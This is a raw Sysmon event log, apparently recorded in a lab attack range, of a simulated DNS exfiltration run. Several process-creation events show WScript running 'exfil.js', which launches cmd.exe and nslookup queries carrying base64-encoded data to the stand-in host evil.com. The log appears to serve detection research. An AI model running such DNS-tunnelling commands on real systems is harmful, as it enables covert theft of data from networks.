10341000x8000000000000000195126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-17A9-629A-1E3E-000000005F02}73603384C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-203E-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.591{2E1864BB-17A9-629A-203E-000000005F02}7804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-1E3E-000000005F02}7360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaegw.tmp 2>&1 10341000x8000000000000000195124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.557{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-1F3E-000000005F02}7688C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.557{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-1F3E-000000005F02}7688C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.541{2E1864BB-17A9-629A-1F3E-000000005F02}76888152C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-1E3E-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1F3E-000000005F02}7688C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1E3E-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-17A1-629A-783D-000000005F02}55521368C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-1E3E-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.510{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.511{2E1864BB-17A9-629A-1E3E-000000005F02}7360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaegw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000195113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.397{00000000-0000-0000-0000-000000000000}6688evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.267{00000000-0000-0000-0000-000000000000}3792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.183{00000000-0000-0000-0000-000000000000}6604evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.084{00000000-0000-0000-0000-000000000000}3848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.988{00000000-0000-0000-0000-000000000000}3568evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.883{00000000-0000-0000-0000-000000000000}3964evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.797{00000000-0000-0000-0000-000000000000}2388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.736{00000000-0000-0000-0000-000000000000}7352evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000195105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.505{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllmpt.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000195104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.673{00000000-0000-0000-0000-000000000000}7224evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.591{00000000-0000-0000-0000-000000000000}4012evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000195102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-17A9-629A-1C3E-000000005F02}57646052C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-1D3E-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1D3E-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.456{2E1864BB-17A9-629A-1B3E-000000005F02}14881044C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-1D3E-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.458{2E1864BB-17A9-629A-1D3E-000000005F02}7288C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-1B3E-000000005F02}1488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmpt.tmp 2>&1 10341000x8000000000000000195094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.425{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-1C3E-000000005F02}5764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.425{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-1C3E-000000005F02}5764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.425{2E1864BB-17A9-629A-1C3E-000000005F02}57646052C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-1B3E-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000195091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52183- 354300x8000000000000000195090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52182- 354300x8000000000000000195089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52181- 354300x8000000000000000195088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.880{00000000-0000-0000-0000-000000000000}3964<unknown process>-udptruefalse127.0.0.1-52181-false127.0.0.1-53domain 354300x8000000000000000195087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52180- 354300x8000000000000000195086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.796{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52179- 354300x8000000000000000195085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.795{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52178- 354300x8000000000000000195084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.795{00000000-0000-0000-0000-000000000000}2388<unknown process>-udptruefalse127.0.0.1-52178-false127.0.0.1-53domain 10341000x8000000000000000195083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1C3E-000000005F02}5764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 